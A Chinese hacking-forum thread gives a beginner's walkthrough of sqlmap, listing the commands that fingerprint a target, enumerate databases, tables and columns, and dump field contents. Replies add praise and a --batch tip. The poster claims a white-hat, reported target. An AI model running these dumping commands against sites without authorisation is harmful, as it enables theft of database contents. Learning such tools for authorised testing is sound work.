查看: 17360|回复: 8

菜鸟如何使用SQLMAP

[复制链接]
发表于 2016-1-10 22:53:56 | 显示全部楼层 |阅读模式
以下内容可能会对大牛造成恶心、眩晕等不良反应。关闭该页面即可好转

      SQLMAP是一个自动注入化工具 运行在Python 2.7 环境有具有很强跨平台性、无图形界面

1.
     使用快捷方式启动
1.jpg
2.  
     现做如下假设   
                             1. 已经安装Python2.7 并已经添加了环境变量
                             2. 已经下载了SQLMAP
                             3. 会使用cmd命令行
                                                      我知道你们都是大牛
3.
     打开要在sqlmap的目录里
2.jpg

注入点 、绝对不要做坏事 我们是白帽黑阔 这已经提交补天了


**************************************


sqlmap.py -u "注入点" //会判断数据库类型,服务操作系统、脚本类型 前后有双引号
3.jpg


03服务器 / asp.net / ms sql 2008


sqlmap.py -u "注入点" --dbs //列数据库 按上键
  
4.jpg




sqlmap.py -u "注入点" -D 数据库名 --tables  //列出表名


5.jpg


sqlmap.py -u "注入点" -D 数据库名 -T 表名 --columns  //猜字段

6.jpg


sqlmap.py -u "注入点" -D 数据库名 -T 表名 -C "字段名2,字段名2” --dump //获得字符、段内容



7.png

评分

参与人数 2i币 +7 收起 理由
Mrlin + 2 不是太详细 但也不错;
C4r1st + 5

查看全部评分

回复

使用道具 举报

发表于 2016-1-11 08:57:47 | 显示全部楼层
我不是大牛@_@
回复 支持 反对

使用道具 举报

发表于 2016-1-11 09:28:08 | 显示全部楼层
完全看不懂的说
回复 支持 反对

使用道具 举报

发表于 2016-1-11 14:31:08 | 显示全部楼层
哪里恶心头疼了
回复 支持 反对

使用道具 举报

发表于 2016-1-11 17:12:02 | 显示全部楼层
不错不错,终于学会了
回复 支持 反对

使用道具 举报

发表于 2016-1-12 14:36:44 | 显示全部楼层
只是一些非常初级的东西,详细的推荐大家去freebuf
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2016-1-13 12:23:53 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

发表于 2016-2-12 10:28:47 | 显示全部楼层
觉得很好呢
回复 支持 反对

使用道具 举报

发表于 3 天前 | 显示全部楼层

Re: 菜鸟如何使用SQLMAP

感谢楼主的分享,对于刚接触SQLMAP的菜鸟来说,这份简明扼要的步骤很实用。你特意强调了“绝不做坏事”和“白帽黑阔”,这点很重要,安全工具用在合法授权范围内才能真正帮助技术成长。另外补充一个小建议:如果觉得每次输入完整URL麻烦,可以先用--batch参数跳过交互询问,或者把常用命令写个批处理脚本,能省不少时间。环境变量没配好的话,直接在SQLMAP目录下打开cmd运行也是可以的。期待你后续更多经验分享!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-5-23 02:41 , Processed in 0.108606 second(s), 23 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部